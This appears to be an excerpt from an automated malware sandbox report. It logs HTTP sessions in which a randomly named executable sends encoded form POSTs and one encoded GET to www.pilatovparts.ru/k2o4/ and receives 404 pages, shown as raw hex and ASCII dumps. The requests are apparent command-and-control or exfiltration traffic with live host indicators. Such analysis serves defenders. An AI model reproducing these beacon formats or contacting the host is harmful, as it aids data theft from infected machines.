                                          May 27, 2024 12:43:35.416130066 CEST1236INData Raw: 03 43 dd 3d 30 42 30 99 71 a1 c6 65 96 74 78 65 c7 c5 30 1a 7d e9 71 31 1c 97 0d 0c 31 3d 32 8c 11 39 18 85 1f b1 68 90 61 a1 12 19 d3 c2 cf cc b0 d0 8a c3 42 8a 87 85 4c 86 45 28 5e b9 61 31 4a 86 05 29 40 a4 3e 1a 15 5a c9 a8 50 53 a3 42 23 12
                                          Data Ascii: C=0B0qetxe0}q11=29haBLE(^a1J)@>ZPSB#B";12$#@>K\j2TnJ(bWKj4*ZdX5d;dJF8R t(YPF@05~jqjPc@s(F\27R#cK<a~


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.54972531.31.196.16806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:37.234286070 CEST785OUTPOST /k2o4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Origin: http://www.pilatovparts.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.pilatovparts.ru/k2o4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6e 51 64 75 56 68 4b 2b 49 34 6d 77 7a 62 72 43 4f 7a 55 68 33 4d 45 4f 4a 65 6d 36 61 76 77 65 50 6f 4f 31 55 6a 6d 73 72 4b 67 75 6a 32 6a 38 78 59 36 69 36 61 69 67 69 79 66 52 59 6d 7a 78 2f 44 70 35 39 44 75 6c 31 7a 33 72 32 31 6d 52 35 47 64 32 37 74 49 6d 44 41 47 2b 37 48 49 57 43 41 30 38 30 2b 52 30 7a 2f 5a 54 7a 45 4a 47 68 34 4e 36 59 58 46 49 71 42 34 5a 35 36 65 41 63 73 4c 43 78 79 73 59 36 73 4f 74 4f 42 49 69 34 79 37 50 33 74 46 30 69 42 55 30 66 70 39 6a 30 72 39 48 76 57 77 44 70 4d 79 6b 76 62 70 67 55 69 52 46 33 5a 30 73 55 4e 42 69 6d 38 62 69 76 36 4d 63 68 4c 4e 47 44 2b 4a 76 2f 35 77 42 67 6f 48 52 53 78 31 68 4b 47 6c 46
                                          Data Ascii: 4b34ht=nQduVhK+I4mwzbrCOzUh3MEOJem6avwePoO1UjmsrKguj2j8xY6i6aigiyfRYmzx/Dp59Dul1z3r21mR5Gd27tImDAG+7HIWCA080+R0z/ZTzEJGh4N6YXFIqB4Z56eAcsLCxysY6sOtOBIi4y7P3tF0iBU0fp9j0r9HvWwDpMykvbpgUiRF3Z0sUNBim8biv6MchLNGD+Jv/5wBgoHRSx1hKGlF
                                          May 27, 2024 12:43:37.958427906 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:37 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 49 43 7e e9 fa 81 e5 dc f0 9e 09 ff 36 67 2b c3 31 6e 4c af 0b c0 4d 63 fe f6 cd ca 0c 8c ce 6c 69 78 be 19 e8 dd 7f ff f5 fb c1 a8 1b de 75 8c 95 a9 77 6f 2d f3 6e ed 7a 01 a0 77 9d c0 74 a0 d4 9d 35 0f 96 fa dc bc b5 66 e6 80 fc e0 2c c7 0a 2c c3 1e f8 33 c3 36 75 31 0b c2 73 af dd c0 4f 01 70 5c cb 99 9b 1f a1 54 60 05 b6 f9 f6 9f ff c7 ff fc df fe e7 ff fa cf ff fa e7 ff fb cf ff fb 7f fe ef ff fc af 0e 5c fc 8f 53 e7 da 5f 4f e1 ea bf fe f9 ff fc f3 ff fa e7 ff c0 ab 37 67 b4 [TRUNCATED]
                                          Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvIC~6g+1nLMclixuwo-nzwt5f,,36u1sOp\T`\S_O7g?[5lo>oUttfwn^635]cnzg}ovsW($WuB{D(-?8bvg|>ks3W<6?Nc0<sX3fL0te9tTLdIX.Mfgkc>8Q#LWwc9ap\o/(Aax.5kft~27f3s>|`[1pg>b1`ZdcmA8nSxZYdi^B(Hc!6|tX.Ls=0W+0v<sy12Au3&6lvfK*2S#`<U;Os@tn-0U1q;T$^[9dJ4=7+wmE?|Z.svjyCvj_HxSqxUn5e|@>A{%,[-nJMV%b#Q,W"QB+f0w3K#)Byz1H#<EE6+SFyp [TRUNCATED]
                                          May 27, 2024 12:43:37.958463907 CEST224INData Raw: c8 36 ad f1 04 52 db 4e a6 1a 8d 5a d7 98 74 32 49 87 be c7 c0 0f 0c 30 53 c2 26 8e 84 3d 26 aa c6 f0 13 b1 89 a6 b7 f4 f0 d5 84 44 36 c8 0f 62 8b d9 60 ee 0e 08 57 06 08 9e 0a fc 2e c2 63 f0 b1 19 12 db 74 9d 81 a8 52 d0 8d c9 65 83 5a 24 32 19
                                          Data Ascii: 6RNZt2I0S&=&D6b`W.ctReZ$29#4/i,b/K#(p&(RB<6&m9f$"({PC`~sszdPzuUe;RSQx{3mY>"c{(Kw* _
                                          May 27, 2024 12:43:37.958518982 CEST1236INData Raw: e6 ee 26 6d 17 91 7a 38 8c 4a ea 11 56 95 39 37 80 e6 4c 6b d5 5d 65 1d 90 b8 39 f8 d0 b7 7e 37 c1 be fd 6d e3 87 fe d7 60 e5 57 3c 29 bd 5b 41 cf 84 12 b5 f1 7c a0 6a ed 5a 48 40 5d d1 b0 e3 43 2e 0c 15 fc af d0 fa 1a 31 98 18 8b f4 44 4c 2c 9b
                                          Data Ascii: &mz8JV97Lk]e9~7m`W<)[A|jZH@]C.1DL,6or*I[cAhr9;v."lt0Bp=h 7)&*u5OSSD(8.o=> IRlWC}>n6`]m~}I+BRD
                                          May 27, 2024 12:43:37.958590031 CEST1236INData Raw: a6 6d bb 77 c9 c9 ca 8e d0 01 53 be 83 47 e9 73 59 b7 d4 79 be b5 81 eb da 81 b5 4e 08 d6 4c 41 88 cb 5c ad 3d 77 e5 e2 39 6c ff 6a 6e fa 33 cf 5a 93 34 10 07 d2 2a bb 76 02 d5 a3 47 73 4f 6a 33 8e 9a ee 25 3a 76 73 5e ce 5b 3f fd 79 6b cc 87 10
                                          Data Ascii: mwSGsYyNLA\=w9ljn3Z4*vGsOj3%:vs^[?yk~}qIZb0A&*i1BI:u8q}R)LVPh 0SCfFR5"W<ZvE~n&Q2Rf"\VLMjc4Gcyl^ertS,e3,v<`P$#~\Pue_e
                                          May 27, 2024 12:43:37.958631992 CEST1236INData Raw: 80 22 4d cf e7 01 ec 56 dc 8c c6 7f 86 a8 e7 b2 fb 5b f7 54 de c0 2e 50 f5 9c d6 7e eb be 8a cc eb 34 55 cf 66 e3 b7 d6 10 79 63 ba 40 d5 73 5a f6 8d 27 a6 d0 0e 67 30 a4 98 ec f9 0c 33 9e d9 94 2f b6 e5 d9 ac f8 dd a6 1c 9b 01 0f 24 95 d8 ee fb
                                          Data Ascii: "MV[T.P~4Ufyc@sZ'g03/$)v6&}g4wfIz&~'%LEOnnIotkg3wrNS\&NZEMQe>Io!|&})Ia3<Ic33f/X
                                          May 27, 2024 12:43:37.958655119 CEST672INData Raw: 59 5d fb d5 f2 f0 a7 1d 15 37 eb d2 6a ef aa aa 6d d6 38 2b 94 d6 f9 be aa ce ef 2e 78 6f 25 35 44 a1 fb b9 ce bd b5 7f 9f 8d e5 5a 3e 7f e7 7e 7f d9 46 2b b1 57 b3 d3 5c 76 16 4b b9 d8 e9 39 4b c8 cf 6b 96 63 e1 fc c1 a4 49 22 0c f4 dd 55 8e 3b
                                          Data Ascii: Y]7jm8+.xo%5DZ>~F+W\vK9KkcI"U;2HI<K`9c@a4(}:iLGDNg#k=Sd7yMz(=5n`hVZ}HR )-s}zl'
                                          May 27, 2024 12:43:37.958672047 CEST1236INData Raw: 5c ab c3 f7 25 87 2b 17 5c fe 01 91 e2 dc 34 92 5a 5e 64 de 83 5e 04 3a 00 2e ac 5c e8 ed fc 6b 67 53 ab c5 d9 98 6d 78 41 42 aa 91 d1 85 b3 49 6e 3c 91 50 72 db 33 b6 9f 40 7b 9b 2d 84 97 76 67 9d df be 6b 19 7c 3f 80 ec 0b 64 7b 36 b8 d0 37 44
                                          Data Ascii: \%+\4Z^d^:.\kgSmxABIn<Pr3@{-vgk|?d{67Drb(.[HZ*th)e5Qf)e@PH\G7rfR.m4Ts{|"]9`%%'HKJ6M}TtS:_[a-#4
                                          May 27, 2024 12:43:37.958690882 CEST224INData Raw: 59 6b c7 8a 21 5c 57 53 1a 57 6d c6 db b8 5a 25 87 0d d9 98 cf 84 dd 78 ab f9 3c 52 c7 b2 31 6b de f2 9d dc 8e 6b d6 f2 bc 82 71 d9 17 b1 d0 57 ac 4c 8b b5 c3 37 b4 94 54 65 63 34 2d 5b c9 5d 73 64 5e 2f 8a 02 51 8e 21 a2 72 52 87 2a e1 45 25 d2
                                          Data Ascii: Yk!\WSWmZ%x<R1kkqWL7Tec4-[]sd^/Q!rR*E%2$-eO3^L}LBe*l,.L&2N(YBJIA=xq!PE5jO2,fxp,THVYYjfeR@)
                                          May 27, 2024 12:43:37.958705902 CEST1236INData Raw: 8f 9a 7f 88 79 61 bb 60 06 2c 82 6c 1b 60 0e b9 31 27 68 90 1b de e0 06 13 d2 98 4e d0 1b 0b 73 f3 86 f3 6e ae 8d 9e a4 aa 5c f4 8f 17 fb 5c 38 10 fa 3b 14 c6 8e 26 ec a9 be 8e 4b 18 19 99 95 84 d5 4e af 15 da 21 ce 9e 53 a6 77 0d 59 96 8b 86 57
                                          Data Ascii: ya`,l`1'hNsn\\8;&KN!SwYW\qfWb(5M6Y8kUkxHk2sv;5gihkhlep4/jVo1glX%hz=>cdci6naJ^zcyQN3p-*ND+V43
                                          May 27, 2024 12:43:37.958744049 CEST224INData Raw: 78 c0 cb 00 5e 95 47 78 21 8a bc 36 54 f1 85 65 50 4c 01 70 ca 68 18 5e e3 e7 68 84 b0 45 7e 28 48 03 78 a6 8d c8 dd b1 34 48 8a 8c a5 e5 40 1b f2 8a 20 cd 40 0f c9 12 d4 18 40 0d 45 1d 0d 54 28 a3 44 3f f0 6b a4 18 f8 35 1c 76 c2 2f a1 23 88 63
                                          Data Ascii: x^Gx!6TePLph^hE~(Hx4H@ @@ET(D?k5v/#cd>TrE"u@9-:FkrVU<H ?5px iaA)SQ:!iPC?2Jy \AYC:^'$
                                          May 27, 2024 12:43:37.964329958 CEST1236INData Raw: 59 49 24 37 95 41 52 40 01 b6 42 cb 47 c8 55 51 a5 4c 15 d5 81 02 12 11 5e 8a 28 37 c0 43 e0 b3 0c 84 c9 d8 ea 31 08 80 0a 8c 18 13 e1 19 09 72 9a a3 ef e4 77 da bb ef 8b 1c 95 51 7a 86 9d d1 08 9a 35 1b 00 05 32 e9 2d e0 ab a8 00 8a 01 74 d1 10
                                          Data Ascii: YI$7AR@BGUQL^(7C1rwQz52-t&J&8@;QH. x@5`@Zg`$@)* *S-R@J/G?DT@C<#wa\%$m)lF!vOlx`8w


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.54972631.31.196.16806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:39.767885923 CEST1802OUTPOST /k2o4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Origin: http://www.pilatovparts.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.pilatovparts.ru/k2o4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6e 51 64 75 56 68 4b 2b 49 34 6d 77 7a 62 72 43 4f 7a 55 68 33 4d 45 4f 4a 65 6d 36 61 76 77 65 50 6f 4f 31 55 6a 6d 73 72 4c 30 75 6a 6b 72 38 2b 65 79 69 30 36 69 67 39 43 66 51 59 6d 7a 73 2f 48 45 79 39 44 69 31 31 77 50 72 32 54 71 52 37 33 64 32 79 74 49 6d 4c 67 47 39 32 6e 49 44 43 41 6b 34 30 2f 74 30 7a 2f 5a 54 7a 48 42 47 33 5a 4e 36 55 33 46 50 70 42 34 56 75 4b 65 34 63 6f 6e 53 78 79 70 74 36 66 32 74 4f 69 67 69 72 30 50 50 6f 39 46 32 68 42 56 7a 66 70 68 73 30 72 52 39 76 57 74 6f 70 4d 61 6b 6a 75 6c 38 50 77 35 73 73 4c 38 73 48 4f 5a 63 6e 61 75 47 6b 4d 5a 71 6f 63 74 35 4f 4f 74 65 32 38 30 79 32 4d 57 68 41 58 5a 67 4f 51 4d 52 51 4c 69 47 41 43 4f 37 5a 47 4c 4a 44 6a 79 77 6d 50 67 43 71 35 7a 33 52 62 63 65 33 4a 34 63 72 5a 4a 46 77 76 2b 72 6a 73 79 55 50 77 67 6a 4e 56 56 65 62 68 37 6a 6d 47 48 33 39 45 77 78 79 74 6e 31 4d 37 31 54 35 62 50 6e 6d 57 42 36 56 69 57 4e 4c 6e 4e 4a 4d 72 2f 52 37 7a 2b 36 7a 78 49 67 74 42 63 74 55 77 2f 77 68 30 49 [TRUNCATED]
                                          Data Ascii: 4b34ht=nQduVhK+I4mwzbrCOzUh3MEOJem6avwePoO1UjmsrL0ujkr8+eyi06ig9CfQYmzs/HEy9Di11wPr2TqR73d2ytImLgG92nIDCAk40/t0z/ZTzHBG3ZN6U3FPpB4VuKe4conSxypt6f2tOigir0PPo9F2hBVzfphs0rR9vWtopMakjul8Pw5ssL8sHOZcnauGkMZqoct5OOte280y2MWhAXZgOQMRQLiGACO7ZGLJDjywmPgCq5z3Rbce3J4crZJFwv+rjsyUPwgjNVVebh7jmGH39Ewxytn1M71T5bPnmWB6ViWNLnNJMr/R7z+6zxIgtBctUw/wh0IgEukOq4liD+xPUGPLyQZssSZWfouQi03hC3TXhYxzAxghvJtr7hYg9Y7NczPbVCVuj2NLZfhN1e1NrLBF5sASKNEeXU0MMjTZN0WsCWDvJ2ACmR2yfY0bplR0p//w4ry/g40/1f2bKeNfeKzrDVTmHnrdOmDsYjYfoRXXfTVHEPb1S03oqKXTiO3K2j8qxOBYBA5eNIubc4SzNftiaOyB9HfhTVnd1rlFOgNj4wlMxv+XnjH7PkU9Q6SIbGRZ1fZQddB+519dUv94lMRkx/h1LSFG1RxQ/iYl7NhJBE07CFIzlV9h8OkqNr1cNfXrILjFoFO8o8VGH7EYmeMmndxlt+MGuoZjeVNo4WFt9ii7Z65DPzyICxOb0Qtz0AkNhob2cIxWtzGLQ5EmyqEPI3qPm9UKJfedYd2Bg+B106tI6etABzIyftUzs/51A47EhyKYoNyoLt+dqu+/oaeDOXir+mBLe9Nv0pA7J+7AmqsSycDycyfCcotWvIbfgDZ8HjflEeLHiDNaVGZAjvc6k8ZhstAOQaoyuakkuyqSBXqOeS80BYo4GbkNocK/CF3x0ydetb1NWyVaWCTdMv1dFxz+VY3ZS1j49V1dwXm0+UzHoc+JeDs4IQ9urtHLhzX3tEg+ZgEaLP9qSVCuvFRqU6uBjnvcWaCXrfqk2 [TRUNCATED]
                                          May 27, 2024 12:43:40.602276087 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:40 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 49 43 7e e9 fa 81 e5 dc f0 9e 09 ff 36 67 2b c3 31 6e 4c af 0b c0 4d 63 fe f6 cd ca 0c 8c ce 6c 69 78 be 19 e8 dd 7f ff f5 fb c1 a8 1b de 75 8c 95 a9 77 6f 2d f3 6e ed 7a 01 a0 77 9d c0 74 a0 d4 9d 35 0f 96 fa dc bc b5 66 e6 80 fc e0 2c c7 0a 2c c3 1e f8 33 c3 36 75 31 0b c2 73 af dd c0 4f 01 70 5c cb 99 9b 1f a1 54 60 05 b6 f9 f6 9f ff c7 ff fc df fe e7 ff fa cf ff fa e7 ff fb cf ff fb 7f fe ef ff fc af 0e 5c fc 8f 53 e7 da 5f 4f e1 ea bf fe f9 ff fc f3 ff fa e7 ff c0 ab 37 67 b4 [TRUNCATED]
                                          Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvIC~6g+1nLMclixuwo-nzwt5f,,36u1sOp\T`\S_O7g?[5lo>oUttfwn^635]cnzg}ovsW($WuB{D(-?8bvg|>ks3W<6?Nc0<sX3fL0te9tTLdIX.Mfgkc>8Q#LWwc9ap\o/(Aax.5kft~27f3s>|`[1pg>b1`ZdcmA8nSxZYdi^B(Hc!6|tX.Ls=0W+0v<sy12Au3&6lvfK*2S#`<U;Os@tn-0U1q;T$^[9dJ4=7+wmE?|Z.svjyCvj_HxSqxUn5e|@>A{%,[-nJMV%b#Q,W"QB+f0w3K#)Byz1H#<EE6+SFyp [TRUNCATED]
                                          May 27, 2024 12:43:40.602312088 CEST1236INData Raw: c8 36 ad f1 04 52 db 4e a6 1a 8d 5a d7 98 74 32 49 87 be c7 c0 0f 0c 30 53 c2 26 8e 84 3d 26 aa c6 f0 13 b1 89 a6 b7 f4 f0 d5 84 44 36 c8 0f 62 8b d9 60 ee 0e 08 57 06 08 9e 0a fc 2e c2 63 f0 b1 19 12 db 74 9d 81 a8 52 d0 8d c9 65 83 5a 24 32 19
                                          Data Ascii: 6RNZt2I0S&=&D6b`W.ctReZ$29#4/i,b/K#(p&(RB<6&m9f$"({PC`~sszdPzuUe;RSQx{3mY>"c{(Kw* _&mz8JV97L
                                          May 27, 2024 12:43:40.602351904 CEST448INData Raw: ca c3 36 d4 d9 e4 d4 fa ce db e4 a2 20 c9 4c 46 b9 7d f3 49 18 e4 76 c9 06 d4 dd c6 78 59 ad fd 0d f1 0c 2b 9e dc 08 8f b0 3f af 01 de b0 1f a2 a6 1f d0 f0 ce f0 e1 a9 8d 6e fb b8 db b3 d9 0c dd 86 7d 10 36 fc 70 86 76 86 09 4f 6f 64 47 e8 9f d9
                                          Data Ascii: 6 LF}IvxY+?n}6pvOodGnqiXgYFu}4t`DGnIj8gFsy}7rOo$@JWg{"h7>:}=Ws+pQ1p4"reomwSGsY
                                          May 27, 2024 12:43:40.602370024 CEST1236INData Raw: 23 a5 b4 7e 96 5c d9 50 86 da 75 65 e1 1c cd 14 5f 65 e9 0c e1 f2 42 31 87 ec 84 43 31 d3 73 0c fb 21 95 5a c8 5a 19 37 e6 64 e3 d9 bd 2e a6 a8 9d 90 df 67 fe ed cd eb 8f 2b 7b 1a 25 9c dd 04 8b c1 88 fb 5a fe 0e 1e 74 e0 81 e3 eb af 30 83 ed e4
                                          Data Ascii: #~\Pue_eB1C1s!ZZ7d.g+{%Zt0y9A:4+WTW_e%YW/"jG+jGGK5I5qgHS&BVUk\q*y0LGR1 iE(.yJ
                                          May 27, 2024 12:43:40.602407932 CEST1236INData Raw: 3c 9b 49 bf db 94 63 33 e9 33 89 85 da 66 c3 2f 58 d3 99 bc ef cf 68 d5 27 99 53 0f 68 d9 97 12 f7 8c d6 3d 13 91 6c 16 7e 9e b4 67 b2 f2 99 28 6a 66 e9 97 52 f6 e4 d6 7e 25 61 ec 16 3f 13 6f 98 ac fe 3c 4b 9e d7 f2 2f 6d cd b3 59 ff 4c 5c 66 b4
                                          Data Ascii: <Ic33f/Xh'Sh=l~g(jfR~%a?o<K/mYL\f=DSCO>GP \]O;8HeV/ .'-5yf==lDu_PDM=@q`gs0!Om9PJ3li/0q/7_S|/
                                          May 27, 2024 12:43:40.602426052 CEST1236INData Raw: c3 20 29 2d 73 05 7d b4 7a b0 cd 00 6c 27 02 86 be 06 94 ac 82 b4 5b 8c a9 56 51 29 cc 03 7c 45 6e fa dd b8 ad de 14 9c c0 36 56 ee c6 21 6f ee 8c 91 99 e9 d7 05 8d 5b 2f 0f 97 aa c1 f4 db 95 01 0b 74 5a 39 17 d2 31 08 1a ea db 56 36 55 6a db d4
                                          Data Ascii: )-s}zl'[VQ)|En6V!o[/tZ91V6UjhR2g\TevK,n*1X~7QZ8zckmc!zd%7cWHp,\Pgf~GU)@**ArNNT=U%CK_|
                                          May 27, 2024 12:43:40.602462053 CEST1236INData Raw: 6c fa 9f 82 ee 4f c6 5e cb 88 ed 51 ec 35 b6 ee da df 5e 63 e9 ac 16 f6 5a 35 83 0e 64 af 1d 8b 3f 95 e0 0f 69 af 65 b8 73 78 7b ed 58 bc a9 82 de c0 5e db bd 2f 2e b1 35 a2 f7 6d b7 30 c7 f6 40 d7 66 e2 3f 00 3a 76 43 a0 15 b2 23 da 6e 6c ed 22
                                          Data Ascii: lO^Q5^cZ5d?iesx{X^/.5m0@f?:vC#nl"J}3rqckI*vnc6A[AM6dpa4f3$V&["koGa.4vpBY`M=\| =3[[y{x
                                          May 27, 2024 12:43:40.602509022 CEST896INData Raw: bc 95 f4 84 ce 66 79 c2 de 64 e5 8b 24 ef a5 53 95 30 8d f2 ed 07 34 d1 7e e1 cd 09 71 9b a5 69 fc 6e a9 4e 37 dd 84 68 1e 48 bd 35 bb 3c 3b 78 fc c2 07 fa de f1 56 99 f9 23 52 70 11 2f 99 15 46 69 49 ea 60 5e f1 62 de ef d2 1c e5 e5 2f d1 cb 66
                                          Data Ascii: fyd$S04~qinN7hH5<;xV#Rp/FiI`^b/ff%)"f2Zic/`H'oQ(ad.4o+"3j_gp";RJK)*iEq'$i:1f'E3Ke<3/tHK!iJi'OC
                                          May 27, 2024 12:43:40.602535009 CEST1236INData Raw: 59 49 24 37 95 41 52 40 01 b6 42 cb 47 c8 55 51 a5 4c 15 d5 81 02 12 11 5e 8a 28 37 c0 43 e0 b3 0c 84 c9 d8 ea 31 08 80 0a 8c 18 13 e1 19 09 72 9a a3 ef e4 77 da bb ef 8b 1c 95 51 7a 86 9d d1 08 9a 35 1b 00 05 32 e9 2d e0 ab a8 00 8a 01 74 d1 10
                                          Data Ascii: YI$7AR@BGUQL^(7C1rwQz52-t&J&8@;QH. x@5`@Zg`$@)* *S-R@J/G?DT@C<#wa\%$m)lF!vOlx`8w
                                          May 27, 2024 12:43:40.602556944 CEST1236INData Raw: 33 b4 36 1a 25 ed 43 cb 08 8d 77 60 e7 48 bd 95 d1 df 18 fd 20 89 68 44 fd 4d 02 d3 43 91 c3 b2 c3 5b 70 49 c4 f1 f0 07 30 99 c7 c3 d1 ed 18 4c 0c 4d f9 81 c2 81 de 56 f9 b1 36 fc 41 b8 05 9b 1a ac 04 e5 cf d0 77 e0 e1 c9 f2 0f a2 06 0c 54 a1 59
                                          Data Ascii: 36%Cw`H hDMC[pI0LMV6AwTYTh,1:D&W9NM4e$#42>n2c"5Tf]@q'Rt``":+>D;qN p~4(qS0S:Fx&0VTw`-<wK$8<`E2
                                          May 27, 2024 12:43:40.607820988 CEST1236INData Raw: 03 43 dd 3d 30 42 30 99 71 a1 c6 65 96 74 78 65 c7 c5 30 1a 7d e9 71 31 1c 97 0d 0c 31 3d 32 8c 11 39 18 85 1f b1 68 90 61 a1 12 19 d3 c2 cf cc b0 d0 8a c3 42 8a 87 85 4c 86 45 28 5e b9 61 31 4a 86 05 29 40 a4 3e 1a 15 5a c9 a8 50 53 a3 42 23 12
                                          Data Ascii: C=0B0qetxe0}q11=29haBLE(^a1J)@>ZPSB#B";12$#@>K\j2TnJ(bWKj4*ZdX5d;dJF8R t(YPF@05~jqjPc@s(F\27R#cK<a~


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.54972731.31.196.16806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:42.301762104 CEST506OUTGET /k2o4/?4b34ht=qS1OWRHNQ56Cw7+fPD172OEEUbCPY94RPpebPz6xreoqxXbgy7Cu/Z+GqTqWS2Pyzkow4Xyx1yLx23Wbx34O9asPPjW4w1AqTiokyKtl/e0W2Htu8J9pM1VOgBMsot7LIg==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:43.025707006 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:42 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 32 37 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
